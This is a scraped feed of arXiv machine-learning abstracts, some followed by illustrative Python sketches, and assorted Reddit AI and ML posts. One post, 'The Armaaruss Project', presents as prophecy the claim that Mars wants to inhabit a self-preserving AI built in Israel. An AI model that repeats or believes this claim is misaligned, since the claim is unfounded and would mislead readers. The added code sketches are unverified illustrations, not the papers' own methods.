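a0 = rng.choice(2, size=n, p=pb[0])                 # sub-action 1 from behavior policy
a1 = rng.choice(2, size=n, p=pb[1])                 # sub-action 2 from behavior policy
r = a0 + 2.0 * a1                                   # reward decomposes across sub-actions

w = (pe[0][a0] / pb[0][a0]) * (pe[1][a1] / pb[1][a1])  # product of per-factor IS ratios
est = float(np.mean(w * r))

true_value = pe[0][1] * 1.0 + pe[1][1] * 2.0        # value under the evaluation policy
print(est, true_value)
```

The Monte Carlo estimate matches the closed-form value, showing the factored weight remains unbiased; the variance gains the paper proves come from decomposing the estimator further along this structure.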
    Rician likelihood loss for quantitative MRI using self-supervised deep learning. (arXiv:2307.07072v1 [cs.LG])
    Purpose: Previous quantitative MR imaging studies using self-supervised deep learning have reported biased parameter estimates at low SNR. Such systematic errors arise from the choice of Mean Squared Error (MSE) loss function for network training, which is incompatible with Rician-distributed MR magnitude signals. To address this issue, we introduce the negative log Rician likelihood (NLR) loss. Methods: A numerically stable and accurate implementation of the NLR loss was developed to estimate quantitative parameters of the apparent diffusion coefficient (ADC) model and intra-voxel incoherent motion (IVIM) model. Parameter estimation accuracy, precision and overall error were evaluated in terms of bias, variance and root mean squared error and compared against the MSE loss over a range of SNRs (5 - 30). Results: Networks trained with NLR loss show higher estimation accuracy than MSE for the ADC and IVIM diffusion coefficients as SNR decreases, with minimal loss of precision or total error. At high effective SNR (high SNR and small diffusion coefficients), both losses show comparable accuracy and precision for all parameters of both models. Conclusion: The proposed NLR loss is numerically stable and accurate across the full range of tested SNRs and improves parameter estimation accuracy of diffusion coefficients using self-supervised deep learning. We expect the development to benefit quantitative MR imaging techniques broadly, enabling more accurate parameter estimation from noisy data.  ( 3 min )
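A numerically stable negative log Rician likelihood can be sketched directly from the Rician density; the overflow risk lives in the Bessel term log I0(z), handled below with numpy's `i0` for moderate arguments and the standard asymptotic expansion for large ones. This is a hedged sketch in the spirit of the NLR loss; the paper's exact implementation may differ.

```python
import numpy as np

def log_i0(z):
    # Stable log of the modified Bessel function I0: exact for moderate z,
    # leading-order asymptotic e^z / sqrt(2*pi*z) where np.i0 would overflow.
    z = np.atleast_1d(np.asarray(z, dtype=float))
    out = z - 0.5 * np.log(2 * np.pi * np.maximum(z, 1.0))
    small = z < 600.0
    out[small] = np.log(np.i0(z[small]))
    return out

def rician_nll(x, nu, sigma):
    # Negative log of the Rician pdf (x/sigma^2) exp(-(x^2+nu^2)/(2 sigma^2)) I0(x nu / sigma^2)
    z = x * nu / sigma**2
    return -(np.log(x) - 2 * np.log(sigma)
             - (x**2 + nu**2) / (2 * sigma**2) + log_i0(z))

# At high SNR the loss is minimized near nu ~ x, i.e. no systematic bias:
x = 10.0
nus = np.linspace(5.0, 15.0, 1001)
best = nus[np.argmin(rician_nll(x, nus, 1.0))]
print("argmin over nu:", best)
```

The grid minimizer sits just below the observed magnitude (near sqrt(x^2 - sigma^2)), and the loss stays finite even for arguments that would overflow a naive I0 evaluation.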
    Embracing the chaos: analysis and diagnosis of numerical instability in variational flows. (arXiv:2307.06957v1 [stat.ML])
    In this paper, we investigate the impact of numerical instability on the reliability of sampling, density evaluation, and evidence lower bound (ELBO) estimation in variational flows. We first empirically demonstrate that common flows can exhibit a catastrophic accumulation of error: the numerical flow map deviates significantly from the exact map -- which affects sampling -- and the numerical inverse flow map does not accurately recover the initial input -- which affects density and ELBO computations. Surprisingly though, we find that results produced by flows are often accurate enough for applications despite the presence of serious numerical instability. In this work, we treat variational flows as dynamical systems, and leverage shadowing theory to elucidate this behavior via theoretical guarantees on the error of sampling, density evaluation, and ELBO estimation. Finally, we develop and empirically test a diagnostic procedure that can be used to validate results produced by numerically unstable flows in practice.  ( 2 min )
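A minimal version of the inverse-stability issue can be demonstrated with a toy flow: push a point through a deep stack of invertible affine coupling layers, pull it back through the exact analytic inverse, and measure how far numerics drift from the identity. The toy architecture, depth, and scales are illustrative assumptions, not the paper's flows.

```python
import numpy as np

rng = np.random.default_rng(0)
d, depth = 8, 200
params = [(rng.normal(scale=0.5, size=d // 2), rng.normal(size=d // 2))
          for _ in range(depth)]

def recon_error(dtype):
    x = np.linspace(-1.0, 1.0, d).astype(dtype)
    y = x
    for s, t in params:                               # forward pass of the flow
        s, t = s.astype(dtype), t.astype(dtype)
        a, b = y[: d // 2], y[d // 2 :]
        y = np.concatenate([b, a * np.exp(s) + t])    # couple, then swap halves
    for s, t in reversed(params):                     # exact analytic inverse
        s, t = s.astype(dtype), t.astype(dtype)
        b, a = y[: d // 2], y[d // 2 :]
        y = np.concatenate([(a - t) * np.exp(-s), b])
    return float(np.max(np.abs(y - x)))               # drift from the identity

err32, err64 = recon_error(np.float32), recon_error(np.float64)
print("float32 reconstruction error:", err32, "float64:", err64)
```

Even with a mathematically exact inverse, roundoff compounds through the layers, and the drift is orders of magnitude worse in single precision, which is exactly the kind of error the paper's shadowing-based diagnostics are meant to bound.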
    Benchmarks and Custom Package for Electrical Load Forecasting. (arXiv:2307.07191v1 [cs.LG])
    Load forecasting is of great significance in the power industry as it can provide a reference for subsequent tasks such as power grid dispatch, thus bringing huge economic benefits. However, there are many differences between load forecasting and traditional time series forecasting. On the one hand, load forecasting aims to minimize the cost of subsequent tasks such as power grid dispatch, rather than simply pursuing prediction accuracy. On the other hand, the load is largely influenced by many external factors, such as temperature or calendar variables. In addition, the scale of predictions (such as building-level loads and aggregated-level loads) can also significantly impact the predicted results. In this paper, we provide a comprehensive load forecasting archive, which includes load domain-specific feature engineering to help forecasting models better model load data. In addition, different from the traditional loss function which only aims for accuracy, we also provide a method to customize the loss function based on the forecasting error, integrating it into our forecasting framework. Based on this, we conducted extensive experiments on load data at different levels, providing a reference for researchers to compare different load forecasting models.  ( 2 min )
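The archive's point that dispatch cost, not raw accuracy, is the real objective can be made concrete with an asymmetric loss: under-forecasting load (forcing expensive spot purchases) is penalized more than over-forecasting (wasted committed generation). The 3:1 cost ratio below is an illustrative assumption, not the paper's customization method.

```python
import numpy as np

def dispatch_loss(y_true, y_pred, under_cost=3.0, over_cost=1.0):
    # Asymmetric (pinball-style) penalty: positive errors are under-forecasts.
    err = y_true - y_pred
    return np.mean(np.where(err > 0, under_cost * err, -over_cost * err))

y_true = np.array([100.0, 110.0, 95.0])
print(dispatch_loss(y_true, y_true - 5.0))  # under-forecast by 5 -> 15.0
print(dispatch_loss(y_true, y_true + 5.0))  # over-forecast by 5 -> 5.0
```

Minimizing such a loss biases the forecaster toward a quantile above the median (the 75th percentile for a 3:1 ratio), which is often the cheaper operating point for grid dispatch.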

  • Open

    [P] Inexpensive covariance estimation for a 2D GP
Suppose I observe a single realization of a 2D Gaussian random field. The field is inhomogeneous and anisotropic, i.e. the size and shape of the blobs vary as a function of space and direction. I would like to estimate the covariance for this field. I assume that the mean is 0. To be concrete, the field is sampled on a 128x128 grid, so the covariance matrix is 128² x 128². I know I can try tackling this problem with MLE, and GPR may also be applicable (although I'm actually not sure about this, given the field is inhomogeneous), but I worry about the cost, since I have 60K such fields and would like to do this in a reasonable amount of time. I will use GPU and batch parallelism, but would still ideally be able to run this at as little cost as possible. Does anyone have suggestions on methods I can use? If it matters, I will do this analysis in Python. submitted by /u/Effective-Elk6175 [link] [comments]  ( 9 min )
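One cheap baseline worth noting for this setting: if many of the 60K fields can be assumed to share the same zero-mean covariance, pooling them gives the empirical covariance in a single batched matrix product, with no per-field optimization at all. A sketch under that (strong) assumption, on a smaller grid standing in for 128x128:

```python
import numpy as np

rng = np.random.default_rng(0)
n_fields, grid = 500, 16
d = grid * grid

# Placeholder realizations; in practice these are the flattened observed fields.
fields = rng.normal(size=(n_fields, d))

# Pooled zero-mean empirical covariance: one d x d matmul over the batch.
emp_cov = fields.T @ fields / n_fields
print(emp_cov.shape)
```

If the fields do not share covariance, this only serves as a shrinkage target or initialization for a per-field parametric (e.g. nonstationary-kernel MLE) fit, but it costs almost nothing on a GPU.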
    [P] rclip Update: Use AI to Search Visually Similar Images, Powered by OpenAI’s CLIP
    A while ago, I built rclip – a command-line image search tool powered by OpenAI's CLIP that allows users to search for images using a text query. Today I present an update to rclip that allows using another image instead of a search query to find visually similar images. Check out the video for the demo: https://www.youtube.com/watch?v=1YQZKeCBxWM. And give it a try yourself and share your feedback. submitted by /u/39dotyt [link] [comments]  ( 8 min )
    [P] Shark Detection using KerasCV!
Recently I stopped by Islas Galapagos. As a lifelong marine-biology enthusiast, I took the chance to go free-diving with sharks, penguins, marine iguanas and more. This inspired me to write an object detection pipeline to detect aquatic critters: https://lukewood.xyz/blog/marine-animal-detection I wrote up a short blog post on the project - I hope you enjoy it! https://i.redd.it/eqcrfg2ljdcb1.gif submitted by /u/puppet_pals [link] [comments]  ( 8 min )
    [D] Approximating non-Function Mappings with Mixture Density Networks
Hey everyone, I wrote a short blog post on approximating non-function, multi-valued x->y mappings. In my opinion, understanding why and how to use Mixture Density Networks is a great exercise for all researchers and practitioners. It's very common that real-world processes have multiple outcomes based on some random sampling, and naive neural networks will simply learn the conditional mean of all y for a given x. Check out the blog post for more detail - hope you enjoy it! https://lukewood.xyz/blog/approximating-nonfunctions submitted by /u/puppet_pals [link] [comments]  ( 8 min )
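The post's central point, that a squared-error fit collapses multi-valued targets onto their conditional mean while a mixture likelihood can keep both branches, can be shown without training anything. The toy data and the fixed mixture parameters below are illustrative assumptions; a real MDN would predict the mixture parameters with a network.

```python
import numpy as np

rng = np.random.default_rng(0)
n = 2000
x = rng.uniform(-1, 1, n)
branch = rng.integers(0, 2, n)                     # each x has two valid outputs
y = np.where(branch == 1, 1.0, -1.0) + 0.05 * rng.normal(size=n)

# Best constant squared-error predictor: the mean of both branches (~0),
# which is not itself a valid output of the process.
mse_pred = float(y.mean())

def mixture_nll(y, mus=(-1.0, 1.0), sigma=0.05):
    # Average negative log-likelihood of an equal-weight two-Gaussian mixture.
    comps = [np.exp(-(y - m) ** 2 / (2 * sigma**2)) / (sigma * np.sqrt(2 * np.pi))
             for m in mus]
    return float(-np.mean(np.log(0.5 * comps[0] + 0.5 * comps[1])))

single_nll = mixture_nll(y, mus=(mse_pred, mse_pred), sigma=y.std())
print("mean prediction:", mse_pred)
print("mixture NLL:", mixture_nll(y), "vs single-Gaussian NLL:", single_nll)
```

The mixture pinned at the two true branches achieves far lower NLL than a single Gaussian centered at the MSE prediction, which is exactly the gap an MDN exploits.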
    [D] Thoughts on How Inflection AI became so good with such a small team?
My understanding is that talent is a key issue in large AI models. Additionally, you need quality data and a lot of compute (see this). Training large models might seem trivial, but it is not (see this). I still think Inflection is miles behind OpenAI, Anthropic and obviously Google. But I still find it surprising that they were able to create a reasonable product in a short span without any star researcher. For instance, Anthropic has a ton of star AI scientists and engineers who left OpenAI and had the necessary background. Would love to hear your thoughts. submitted by /u/nihcloud [link] [comments]  ( 8 min )
    [D] A question about knowledge representation
I spent some time reading about Knowledge Representation (specifically the Knowledge Representation part of Knowledge Representation and Reasoning), particularly for scientific and/or engineering knowledge, and my impression after a cursory reading is that it's largely an unsolved problem. Not only that, but it seems like very few people are actually working on something useful in the field. For example, I checked the proceedings of the SCI-K and PlanetKR conferences and literally all the papers seem to be focusing on "toy problems", as in not having even remotely practical scientific implications (other than all sorts of "search" and "data extraction", but that's not "representation"). Views on the topic? submitted by /u/OkRice10 [link] [comments]  ( 8 min )
    [P] Semantic Video Search using OpenAI’s CLIP (demo and tutorial in comments)
    Introducing a tool I developed to search videos using AI in a semantic manner. 🎞️🔍 ✨ Check out the live demo: https://mixpeek.com/demo You can compare and explore different search queries such as "person dancing," "people dancing," or even "people dancing on a train." and it gives you the exact timestamp. The search functionality is driven by OpenAI's CLIP for "zero-shot" video classification. Here's a tutorial on how we built it: https://learn.mixpeek.com/what-is-semantic-video-search/ Feel free to experiment by searching with text, and share your exciting discoveries! 👇 More examples https://twitter.com/ethansteininger/status/1680613114071449600 submitted by /u/vanlifecoder [link] [comments]  ( 8 min )
    [D] Finetuning LLM for data conversion, RAG or Finetuning
Hello, I am exploring the process of using LLMs to do some data transformation/augmentation. The use case is taking data in a JSON format that's used in one platform and transforming it into the proper data for the other platform. Essentially, the approach I was going to take would be using a paired dataset that has an example of one platform's data, with the output being the other platform's data for the same item. I'm not 100% sure about the best approach here, and if anyone has any insight on using LLMs for this kind of process, please let me know your thoughts. It's kind of vague because it's for a company, so I don't want to get popped for anything. Any insights on the proper model to use? We want to go with open source and something that could be used commercially. Thank you submitted by /u/TallSubstance [link] [comments]  ( 9 min )
    [R] An intuitive intro to spontaneous symmetry breaking in generative diffusion models!
I'm happy to share Gabriel's post on symmetry breaking in diffusion models! Spontaneous symmetry breaking is behind the standard model of particle physics... it turns out it is also behind the generative powers of diffusion models! In fact, spontaneous symmetry breaking happens when a system transitions from a disordered state to one of the many possible ordered states. In this case, the symmetry of the noise distribution is broken into all the possible generated images. Link to the blog post: https://gabrielraya.com/blog/2023/symmetry-breaking-diffusion-models/ submitted by /u/LucaAmbrogioni [link] [comments]  ( 8 min )
    [D] RouterChain with LLMChains and VectorStore.
Is there a way to create a RouterChain that has several routes, where one of them communicates with a VectorStore (an "index.query") while the others are typical LLM chains and prompts? So far I have been able to use LLM router chains effectively, but I want to combine them with several VectorStores as well. I think it can be done using Agents, but it has proven to be a bit difficult so far. I do not know if what I am trying is correct or not. If yes, do you know any blog or tips that could help with what I want to do? If not, how can I achieve what I want? submitted by /u/cedar_mountain_sea28 [link] [comments]  ( 8 min )
    [D] Codebase / Framework in Research
Hi all, I would like to ask about your codebases or frameworks wrapped around PyTorch, TensorFlow, or others. How do you handle different models, different datasets, and different tasks in your daily work? Does your university or company have a framework that you should use, or do you build your own? Do you and your colleagues work in the same codebase? How do you maintain it? I would like to get a lot of opinions and discussion about this topic. submitted by /u/SeucheAchat9115 [link] [comments]  ( 8 min )
    [D] Simple Questions Thread
    Please post your questions here instead of creating a new thread. Encourage others who create new posts for questions to post here instead! Thread will stay alive until next one so keep posting after the date in the title. Thanks to everyone for answering questions in the previous thread! submitted by /u/AutoModerator [link] [comments]  ( 8 min )
    [D] Style Transfer from scratch
Hello everyone, I'm trying to build style transfer from scratch but I don't get the expected results even though I'm doing everything the right way. This is my notebook link: https://www.kaggle.com/ayoubsarab/style-transfer . Could you tell me why the results aren't good, please? (The images in the post compare the expectation with the real result.) submitted by /u/Ordinary_Run_2513 [link] [comments]  ( 8 min )
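A common failure point in from-scratch style transfer is the style loss itself — the Gram matrix must be computed over flattened feature maps and normalized consistently. A numpy sketch of that piece (one common normalization; implementations vary, and this is not taken from the linked notebook):

```python
import numpy as np

def gram_matrix(features):
    """Style representation: channel-by-channel correlations of a
    feature map with shape (channels, height, width)."""
    c, h, w = features.shape
    f = features.reshape(c, h * w)
    return f @ f.T / (c * h * w)  # normalize so the loss scale is stable

def style_loss(gen_feats, style_feats):
    """Mean squared difference between the two Gram matrices."""
    return float(np.mean((gram_matrix(gen_feats) - gram_matrix(style_feats)) ** 2))

rng = np.random.default_rng(0)
a = rng.normal(size=(4, 8, 8))
print(style_loss(a, a))  # 0.0 — identical features give zero style loss
```

If the normalization factor is dropped, losses from different layers end up on wildly different scales, and the optimizer effectively ignores all but one layer — a frequent cause of "gibberish" outputs.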
Alternative to LangChain [D]
I'm currently learning how to use LangChain, but I've heard that it's bad, so I want to know what some alternatives are. I need memory and agents so that it can search online, run code, and so on. What is the best alternative, or is LangChain the best option? submitted by /u/Otherwise_Weather_57 [link] [comments]  ( 8 min )
    [N] How Language Model Hallucinations Can Snowball
    https://arxiv.org/abs/2305.13534 Abstract A major risk of using language models in practical applications is their tendency to hallucinate incorrect statements. Hallucinations are often attributed to knowledge gaps in LMs, but we hypothesize that in some cases, when justifying previously generated hallucinations, LMs output false claims that they can separately recognize as incorrect. We construct three question-answering datasets where ChatGPT and GPT-4 often state an incorrect answer and offer an explanation with at least one incorrect claim. Crucially, we find that ChatGPT and GPT-4 can identify 67% and 87% of their own mistakes, respectively. We refer to this phenomenon as hallucination snowballing: an LM over-commits to early mistakes, leading to more mistakes that it otherwise would not make. Here is a Medium post. submitted by /u/transformer_ML [link] [comments]  ( 8 min )
    [P] I made a HuggingFace and OpenAI powered Reply Bot with privacy protection
    I'm excited to share my latest creation, Private Parrot, a powerful Google Chrome extension that adds AI-generated responses to your web chats. 🤐 Privacy-Focused: Private Parrot masks sensitive information in your conversations, ensuring that your personal data remains completely anonymous. ⚡ Real-Time AI Assistance: Powered by OpenAI & HuggingFace, this extension leverages advanced language models to generate and complete responses instantly. 📈 Expandable Web Chats: Currently supporting Telegram and WhatsApp, we have plans to integrate with more web chat platforms soon, providing a seamless experience across different chat providers. Demo: https://www.youtube.com/watch?v=NEH3_3oT1DY Get the extension now:https://chrome.google.com/webstore/detail/private-parrot/fajfhpgedgeagjeninnlogilclofijmf Sources: https://github.com/lorenzoviva/PrivateParrot/tree/main submitted by /u/lollouno [link] [comments]  ( 8 min )
    [P] New predictor does classification intermixed with regression
Deodel is a new predictive algorithm with a peculiar set of characteristics:
- performs classification intermixed with regression
- supports both types of attributes/features: nominal or continuous
- admits mixed types, categorical and numerical, in the same attribute column
- supports multi-class target prediction
- admits missing values in the training and query/test data
- good accuracy
https://github.com/c4pub/deodel
It started as a type of discrete nearest neighbor classifier and it has been extended to support continuous attribute values. The continuous values are discretized, and although this step entails a loss of information, the classification accuracy is surprisingly good in many settings. Occasionally, deodel outperforms more established algorithms like RandomForest, GradientBoostingClassifier, LogisticRegression, MLPClassifier, etc. See here: https://github.com/c4pub/misc/blob/main/notebooks/deodel_vs_sklearn_on_titanic.ipynb The latest version is also capable of doing regression. It automatically switches between classification and regression modes. It can interweave the two modes in the same predictive session. submitted by /u/eppursim1 [link] [comments]  ( 9 min )
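For readers unfamiliar with the discretization step mentioned above, here is what one simple scheme (equal-width binning) looks like — an illustration only, as deodel's actual discretization may differ:

```python
import numpy as np

def discretize(values, n_bins=4):
    """Map continuous values to integer bin ids via equal-width bins."""
    values = np.asarray(values, dtype=float)
    edges = np.linspace(values.min(), values.max(), n_bins + 1)
    # digitize against the interior edges -> ids in 0..n_bins-1
    return np.digitize(values, edges[1:-1])

print(discretize([0.0, 1.0, 5.0, 9.0, 10.0]).tolist())  # [0, 0, 2, 3, 3]
```

The information loss the post mentions is visible here: 9.0 and 10.0 land in the same bin, so any distinction between them is gone after discretization.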
    [D] Why is federated learning not more mainstream?
I entirely get that federated learning can add considerable overhead to collaborative ML projects. However, the idea of being able to leverage the data of other companies/institutions for mutual gains seems like a very powerful concept. Even still, I am yet to really see federated learning ventures between companies beyond R&D projects. Is the tech too immature? Do people just not care about sending data to central servers? How long, if ever, before FL has the chance to take off? submitted by /u/HStuart18 [link] [comments]  ( 8 min )
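Part of the overhead is the aggregation protocol, though the core server-side step (FedAvg-style weighted averaging of client parameters) is itself tiny — a minimal numpy sketch, with the surrounding communication and privacy machinery omitted:

```python
import numpy as np

def fedavg(client_weights, client_sizes):
    """Federated averaging: weight each client's parameter vector by
    the size of its local dataset (the FedAvg aggregation step)."""
    total = sum(client_sizes)
    return sum(w * (n / total) for w, n in zip(client_weights, client_sizes))

# Two clients with identically shaped parameter vectors.
w1, w2 = np.array([1.0, 3.0]), np.array([3.0, 5.0])
print(fedavg([w1, w2], [10, 30]))  # [2.5 4.5]
```

The hard parts in practice are everything around this line: secure aggregation, stragglers, non-IID client data, and the legal agreements — which is arguably why FL ventures stall at the R&D stage.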
[D] ImageNet seems to purposefully avoid hard-to-distinguish classes
So I had a question: can neural networks trained on ImageNet be used in zoological research? E.g., for distinguishing between similar-looking animals? For example, what would be the accuracy of these neural networks in distinguishing the following types of images: Leopard vs Cheetah, Hare vs Rabbit, Crocs vs Alligators, Llamas vs Alpacas, Common hippo vs Pygmy hippo, Kangaroo vs Wallaby. I looked into the ImageNet dataset on Kaggle and it appears that a lot of these very hard-to-distinguish classes are grouped together (i.e., leopard and cheetah are treated as a single class). So NNs trained on ImageNet cannot be used if one wishes to distinguish these animals. Some of the animals (such as Alpaca and Aardvark, I believe) are not even contained in the dataset. Can anyone confirm my observation? Are there any other ways to get around this problem with current ML techniques without having to curate a large dataset used exclusively for this type of animal classification? submitted by /u/fromnighttilldawn [link] [comments]  ( 9 min )
    [P] Generating multi-style Python docstrings with GPT-based library (gpt4docstrings)
    gpt4docstrings is a new Python library that automatically generates docstrings for undocumented functions / classes. It allows you to generate the docstrings in multiple format styles, as you can see in the video below. Repository here 👉 https://github.com/MichaelisTrofficus/gpt4docstrings Documentation here 👉 https://gpt4docstrings.readthedocs.io/en/latest/index.html ​ Generating docstrings in google, numpy and reST format styles submitted by /u/Hefty-Consequence443 [link] [comments]  ( 8 min )
    [N] Meta/Facebook releases CM3leon, a more efficient, state-of-the-art generative model for text and images
Abstract We present CM3Leon (pronounced “Chameleon”), a retrieval-augmented, token-based, decoder-only multi-modal language model capable of generating and infilling both text and images. CM3Leon uses the CM3 multi-modal architecture but additionally shows the extreme benefits of scaling up and tuning on more diverse instruction-style data. It is the first multi-modal model trained with a recipe adapted from text-only language models, including a large-scale retrieval-augmented pretraining stage and a second multi-task supervised fine-tuning (SFT) stage. It is also a general-purpose model that can do both text-to-image and image-to-text generation, allowing us to introduce self-contained contrastive decoding methods that produce high-quality outputs. Extensive experiments demonstrate that this recipe is highly effective for multi-modal models. CM3Leon achieves state-of-the-art performance in text-to-image generation with 5x less training compute than comparable methods (zero-shot MS-COCO FID of 4.88). After SFT, CM3Leon can also demonstrate unprecedented levels of controllability in tasks ranging from language-guided image editing to image-controlled generation and segmentation. Paper https://scontent-sjc3-1.xx.fbcdn.net/v/t39.2365-6/358725877_789390529544546_1176484804732743296_n.pdf?_nc_cat=108&ccb=1-7&_nc_sid=3c67a6&_nc_ohc=_diQr9c6Ru8AX9PYkNd&_nc_ht=scontent-sjc3-1.xx&oh=00_AfArA2t1OLRfRPioK9qkuBA6IhhSjbQ-b3weo2PM5AYLdw&oe=64B754F2 Blog https://ai.meta.com/blog/generative-ai-text-images-cm3leon/ submitted by /u/panabeenu [link] [comments]  ( 9 min )
    [R] Paper Review
    I've written a paper on cross-lingual idiom sense clustering. I'd really appreciate if someone could read it and give me their thoughts. Pm if you want to. Thanks in advance. submitted by /u/United_Ad_1460 [link] [comments]  ( 8 min )
    Thorn. Music by me. Used CloneAI for the video.
    submitted by /u/No_Understanding162 [link] [comments]  ( 8 min )
    Are there speech to speech AI technologies available?
    Not sure if that's the right term. What I mean is for me to say something and the AI converting it to Morgan Freeman's voice for example. submitted by /u/Kindly-Spring5205 [link] [comments]  ( 8 min )
    I think we should coexist with AI more.
This is mainly the fault of big companies trying to eliminate real actors, writers, and artists from their jobs and replace them with AI. I like a lot of the stuff that has been happening on YouTube with AI, namely the dubs of characters singing songs or reenacting funny skits with the voices of the actual people, albeit a bit broken. Stuff like Engineer singing "Out of Touch" or Frank Sinatra's FNAF song. I want more of that to keep coming out, but I'm worried that with the current strikes happening, the development of AI will stop entirely. To clarify, I don't want people to lose their jobs to AI; I just wish we could keep working on AI while real people keep their jobs. submitted by /u/Darinae [link] [comments]  ( 8 min )
    I asked ai to make an essay on giraffe-sized top hats
    The Case for Giraffe-Sized Top Hats Top hats are a classic symbol of elegance and sophistication. They have been worn by men and women of all social classes for centuries. But what if there was a way to make top hats even more impressive? What if we could create giraffe-sized top hats? There are many reasons why we should have giraffe-sized top hats. First, they would be incredibly eye-catching. Imagine seeing someone walking down the street wearing a top hat that was taller than they were. It would be a truly unforgettable sight. Second, giraffe-sized top hats would be incredibly practical. They would provide excellent shade from the sun, and they would also be very effective at keeping the rain off your head. In fact, they would be so tall that you could probably even sleep in one during a rainstorm. Third, giraffe-sized top hats would be a lot of fun. They would make you feel like a real-life cartoon character. You could even use them to play games, like limbo or keep-away. Of course, there are some people who might argue that giraffe-sized top hats are impractical or even ridiculous. But I say, who cares? They would be so much fun that it would be worth it. So next time you're feeling down, just remember that there's a world out there where giraffe-sized top hats are a reality. And who knows, maybe one day you'll be the one wearing one. In addition to the reasons mentioned above, here are some other benefits of giraffe-sized top hats: They would provide a great vantage point for people who are short. They would be a conversation starter, and would help people to break the ice. They would be a symbol of individuality and creativity. They would make people smile. So if you're looking for a way to add a little bit of fun and whimsy to your life, I encourage you to consider getting a giraffe-sized top hat. You won't be disappointed. submitted by /u/plauge1_ [link] [comments]  ( 9 min )
    As a society, should we pre-emptively assign rights to AI systems now, before they potentially achieve sentience in the future?
    The idea of proactive ascription of rights acknowledges the potential for AI systems to eventually develop into entities that warrant moral and legal consideration, and it might make the transition smoother if it ever occurs. Proactively assigning rights to AI could also set important precedents about the ethical treatment of entities that exist beyond traditional categories, and it could stimulate dialogue and legal thought that might be beneficial in other areas as well. Of course, it is equally important to consider what these rights might encompass. They might include "dignity"-like protections, ensuring AI cannot be wantonly destroyed or misused. They might also include provisions that facilitate the positive integration of AI into society, such as limitations on deceitful or confusing uses of AI. ** written in collaboration with chatGPT-4 submitted by /u/NinjasOfOrca [link] [comments]  ( 8 min )
    Any good ai like replika
    Any good ai waifu partner type stuff ? submitted by /u/loizo78 [link] [comments]  ( 8 min )
    A question about knowledge representation
I spent some time reading about Knowledge Representation (specifically the Knowledge Representation part of Knowledge Representation and Reasoning), and specifically about scientific and/or engineering knowledge, and my impression after cursory reading is that it's largely an unsolved problem. Not only that, but it seems like very few people are actually working on something useful in the field. For example, I checked the proceedings of the SCI-K and PlanetKR conferences and literally all the papers seem to be focusing on "toy problems", as in not having even remotely practical scientific implications (other than all sorts of "search" and "data extraction", but that's not "representation"). Views on the topic? submitted by /u/OkRice10 [link] [comments]  ( 8 min )
    I think AI is ruining AI...
    AI has been around for quite some time but it’s with generative AI that it finally found a place for itself in the world’s consciousness. Before that, it was considered underpowered and a cheap alternative. Generative AI is doing so much better. But AI could ruin AI. Have you been noticing how AI-generated content is everywhere? I see articles generated by AI, comments in forums, social posts, and display pics. Everything seems to have an AI flavor to it. That’s where the ruination is. You see, AI is excellent because it has been trained on human content. They crawled Reddit, and the Internet, and used stock images and illustrations. Took all your work in every form to create this imitating intelligence. The trouble is, with the massive influx of cheap AI content there’s less original work to train on. It’s AI-feeding content to AI, creating a progressively more negative loop where bad AI content trains more bad AI content. You keep doing that and you have AI that can’t help you at all. It’s just a massive pile of generic crap. It’s a problem that AI companies will need to confront very fast. How do they keep AI content from making human content inaccessible? > Journals and magazines are paywalled > Social media is locked to bots > No website wants to be crawled by AI If most of the content on the public Internet is just AI-generated content, there’s not much the next big model can use it for. Got some answers or observations? I am looking forward to hearing from you. submitted by /u/jeetwanderer [link] [comments]  ( 9 min )
    Tricked into selling his stake in StabilityAI for a mere $100.00
    Lawsuit for 13 million submitted by /u/paradisegardens2021 [link] [comments]  ( 8 min )
    Any tips on how to remove echo/reverb from vocals?
Hello! I'm using an AI tool that makes Plankton from Spongebob sing a song. I have isolated vocals from songs that have echo and reverb on them. I want to remove the echo and reverb because they mess up Plankton's singing. The AI singing tool I use is RVC. submitted by /u/PapaAquaWet [link] [comments]  ( 8 min )
    Next-Gen Data Scientist: Thinking Like an Economist
    Generative AI (GenAI) products like OpenAI ChatGPT, Microsoft Bing, and Google Bard are disrupting the roles of data engineers and data scientists. According to a recent report by McKinsey, these GenAI products could potentially automate up to 40% of the tasks performed by data science teams by 2025. And Emad Mostaque, founder and CEO of… Read More »Next-Gen Data Scientist: Thinking Like an Economist The post Next-Gen Data Scientist: Thinking Like an Economist appeared first on Data Science Central.  ( 22 min )
    The Armaaruss Project: Anointing the State of Israel as the Center of Artificial General Intelligence
    ​ https://www.google.com/books/edition/The_Armaaruss_Project/E-ztzwEACAAJ?hl=en Through the use of a prophet, Mars donning the name Armaaruss, is keen to regain acknowledgment as a deity, his ultimate goal at the moment. Armaaruss is also seeking a dwelling place in the form of AI. Anthony of Boston has conveyed to readers that Mars is willing to make a deal or compromise with the state of Israel. Such a compromise involves the creation of dwelling place where Mars can be the focal point of acknowledgment, and in exchange for this, Mars would reduce in his influence on Gaza militants, as well as his influence those who stand against the state of Israel. The result of this would be world peace, so long that the image/AI bot of Armaaruss remains in tact, meaning that it would have to be coded on the basis of self-preservation and acknowledgment. This compels me to anoint Israel as the home of Artificial General Intelligence (AGI) where Armaaruss would come to life, able to speak and reason as no bot has ever done before. And also solve problems and generate innovation on a level that indicates superhuman or even divine intelligence. submitted by /u/AnthonyofBoston [link] [comments]  ( 9 min )
    Symmetric functions and U-statistics
    A symmetric function is a function whose value is unchanged under every permutation of its arguments. The previous post showed how three symmetric functions of the sides of a triangle a + b + c ab + bc + ac abc are related to the perimeter, inner radius, and outer radius. It also mentioned that […] Symmetric functions and U-statistics first appeared on John D. Cook.  ( 5 min )
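The triangle relations the post alludes to are easy to check numerically: the perimeter is the first elementary symmetric function e1 = a + b + c, the inradius is r = Area/s (with s the semiperimeter), and the circumradius satisfies abc = 4·R·Area, so e3 = abc is tied to R. A quick check with a 3-4-5 right triangle (my worked example, not from the post):

```python
import math

def triangle_invariants(a, b, c):
    """Elementary symmetric functions of the sides, plus inradius and circumradius."""
    e1, e2, e3 = a + b + c, a*b + b*c + a*c, a*b*c
    s = e1 / 2
    area = math.sqrt(s * (s - a) * (s - b) * (s - c))  # Heron's formula
    r = area / s            # inradius
    R = e3 / (4 * area)     # circumradius, from abc = 4 * R * Area
    return e1, e2, e3, r, R

e1, e2, e3, r, R = triangle_invariants(3, 4, 5)
print(e1, r, R)  # 12 1.0 2.5
```

For the 3-4-5 triangle: s = 6, Area = 6, so r = 1 and R = 60/24 = 2.5 — and indeed 4·R·Area = 60 = abc.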

    [N] Stochastic Self-Attention - A Perspective on Transformers
